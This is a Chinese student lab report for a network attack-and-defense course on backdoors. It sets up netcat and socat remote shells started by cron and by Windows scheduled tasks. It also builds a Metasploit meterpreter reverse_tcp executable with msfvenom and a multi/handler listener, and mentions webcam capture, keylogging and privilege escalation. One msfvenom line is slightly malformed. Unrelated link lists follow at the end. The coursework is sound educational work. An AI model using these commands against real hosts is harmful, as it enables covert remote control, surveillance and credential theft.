1.实践基础

1.1.什么是后门

  • 后门就是系统或者软件在不经过正常认证流程就可以连接或使用的通道。
  • 后门的产生有以下原因:

1.系统或软件在编写最初时程序员人为留下的特殊通道

2.系统或软件在编写时由于程序本身的原因产生的漏洞而被不法分子利用产生的后门

3.不法分子利用自制木马或其他攻击程序植入正常用户的主机产生的后门

1.2.基础问题

  • 例举你能想到的一个后门进入到你系统中的可能方式?

随意点击网页链接浏览未知内容的网页

随意在网上下载未经认证的软件

使用游戏外挂

  • 例举你知道的后门如何启动起来(win及linux)的方式?

Windows中启动应用程序时被启动

Linux中后台输入命令启动

  • Meterpreter有哪些给你映像深刻的功能?

可以在一个正常的可执行文件中添加反弹链接的代码,使得它成为一个后门

通过该软件可以调取被入侵主机的摄像头和音频输入设备,实现实时拍照,摄像和录音的功能,还能监听被入侵主机的键盘输入,获取其当前输入的内容,这就让我们想到盗取用户密码等...可怕的事情

  • 如何发现自己有系统有没有被安装后门?

1.通过杀毒软件的防护和扫描功能

2.不定时的检查电脑当前运行中的各种程序,发现异常进程因立即关闭

2.实践内容

2.1.使用netcat获取主机操作Shell,cron启动

  • kali中是自带netcat软件的所以我们不需要下载就可以正常使用。而Windows系统中是没有该程序的,需要先下载才可以进行我们的实验。

    可以在老师的码云附件中下载(下载链接),无需安装解压即可使用。

注:由于控制需要通过网络,所以要首先保证攻击方主机和被攻击者主机网络是可连通的,由于实验是用虚拟机与物理机相互攻击,且两者使用同一网络,所以不存在该问题。

  • 获取IP地址,Windows系统输入ipconfig,Linux系统输入ifconfig

  • 在Linux系统中打开命令行,输入

nc -l -p 2329

在Windows系统中进入netcat程序所在文件夹,打开命令行输入

ncat 172.16.2.34 2329 -e cmd.exe

注:netcat中参数

-l 代表开启监听

-p 指定端口

-e 发送一个指定应用程序



  • 两个系统可以互相实现调用shell的操作,不过Linux发送的是-e /bin/sh而不是cmd.exe

2.2.使用socat获取主机操作Shell, 任务计划启动

  • socat拥有的功能与netcat并没有什么区别,这部分主要是使用Windows的任务计划的功能让其在某个特定时段自动开启连接

  • 首先进入

控制面板-->搜索“管理工具”-->任务计划  并进入

  • 点击创建任务

  • 在触发器选项卡中设置在每天用户登录时启动
  • 在操作中加入socat.exe在可选参数中填入
tcp-listen:2329 exec:cmd.exe,pty,stderr

  • 使用快捷键Win+L快速注销用户再重新登录,可以发现程序已经启动了

  • 然后在kali中输入

socat - tcp:172.16.2.65 2329

就可以连接到任务Windows主机了

同样也可以在Linux上设置计划任务,用Windows去连接,Linux命令格式如下:

* * * * * socat tcp-listen:[PORT] exec:/bin/sh,pty,stderr
//分 时 日 月 年 命令 参数:端口号 发送程序,类型

2.3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 输入命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.2.34 `PORT=2329 -f exe > 20162329_backdoor.exe

-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.

-x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。

-e 使用的编码器,用于对shellcode变形,为了免杀。

-i 编码器的迭代次数。如上即使用该编码器编码5次。

-b badchar是payload中需要去除的字符。

LHOST 是反弹回连的IP

LPORT 是回连的端口

-f 生成文件的类型

> 输出到哪个文件

  • 使用ncat命令实现文件的传输

可以看到我们做好的后门已经传输到了Windows系统上,然后运行我们这个程序结果什么事情都没有发生,但其实后门已经打开了,接下来就是实现后门的连接和做一些 骚操作

  • 首先要在Linux系统上打开对后门程序的连接监听
  • 输入msfconsole进入MSF控制台,如图还给我们画出了一个小忍者(黑客):
  • 依次输入下列命令
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.2.34
set LPORT 2329
exploit
  • 结果就连接成功了,如下图:

2.4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 那我们能做点什么呢?help一下

  • 发现我们有好多事情可以做,比如调用对方的摄像头,拍个照

  • 提个权吧

3.总结与体会

通过本次实验切实的了解了什么是后门,并且通过一系列操作在一定条件下我们也自己实现了后门的制作和渗透入侵,这也让我意识到了网络安全的重要性,然后想了想以前自己在网上随便下载软件和打开网页,真是让我感到细思极恐。实验既有趣又有用,我觉得以后我一定会更注意网络安全防护!!

2018-2019-2 网络对抗技术 20162329 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. robot framework

    一.步骤 1.创建工程和测试套件 2.创建测试案例 3.写脚本,运行案例 4.查看运行结果 report报告主要是概括性的报告,总结案例执行情况.log报告是更为详细的案例步骤的报告. 二.RIDE工 ...

  2. React Router 4.x 开发,这些雷区我们都帮你踩过了

    前言 在前端框架层出不穷的今天,React 以其虚拟 DOM .组件化开发思想等特性迅速占据了主流位置,成为前端开发工程师热衷的 Javascript 库.作为 React 体系中的重要组成部分:Re ...

  3. jQuery循环遍历取值

    1:循环遍历取值 var arr = new Array(); $(".plus-tag a span").each(function(i) { arr[i] = $(this). ...

  4. SpringMVC+Apache Shiro+JPA(hibernate)整合配置

    序: 关于标题: 说是教学,实在愧不敢当,但苦与本人文笔有限,实在找不到更合理,谦逊的词语表达,只能先这样定义了. 其实最真实的想法,只是希望这个关键词能让更多的人浏览到这篇文章,也算是对于自己写文章 ...

  5. 看不到git远程分支

    1.先用fetch命令更新remote索引 $ git fetch 2.再查看remote分支,发现已经可以看到目标分支 $ git branch -a 3.再切换分支 $ git checkout ...

  6. word20170105订酒店 hotel reservation有用的词和句子

    有用的词: hotel reservation/booking: 酒店预订 standard room:标准间 suite: 套房 king size bed: 大床房 double bed:双床房 ...

  7. 项目Alpha冲刺(团队)-第二天冲刺

    格式描述 课程名称:软件工程1916|W(福州大学) 作业要求:项目Alpha冲刺(团队)-代码规范.冲刺任务与计划 团队名称:为了交项目干杯 作业目标:描述第二天冲刺的项目进展.问题困难.心得体会 ...

  8. ASP.NET Core学习系列

    .NET Core ASP.NET Core ASP.NET Core学习之一 入门简介 ASP.NET Core学习之二 菜鸟踩坑 ASP.NET Core学习之三 NLog日志 ASP.NET C ...

  9. 【转】让EntityManager的Query返回Map对象

    在JPA 2.0中我们可以使用entityManager.createNativeQuery()来执行原生的SQL语句.但当我们查询结果没有对应实体类时,需使用entityManager.create ...

  10. 云栖社区用机器人爬CSDN的文章?

    这个云栖社区的文章https://yq.aliyun.com/ziliao/539322 这篇文章是我13年写的,不知道咋插入图片,见谅. 下面是我的文件记录 分享XAML图标的网站 原创 2013年 ...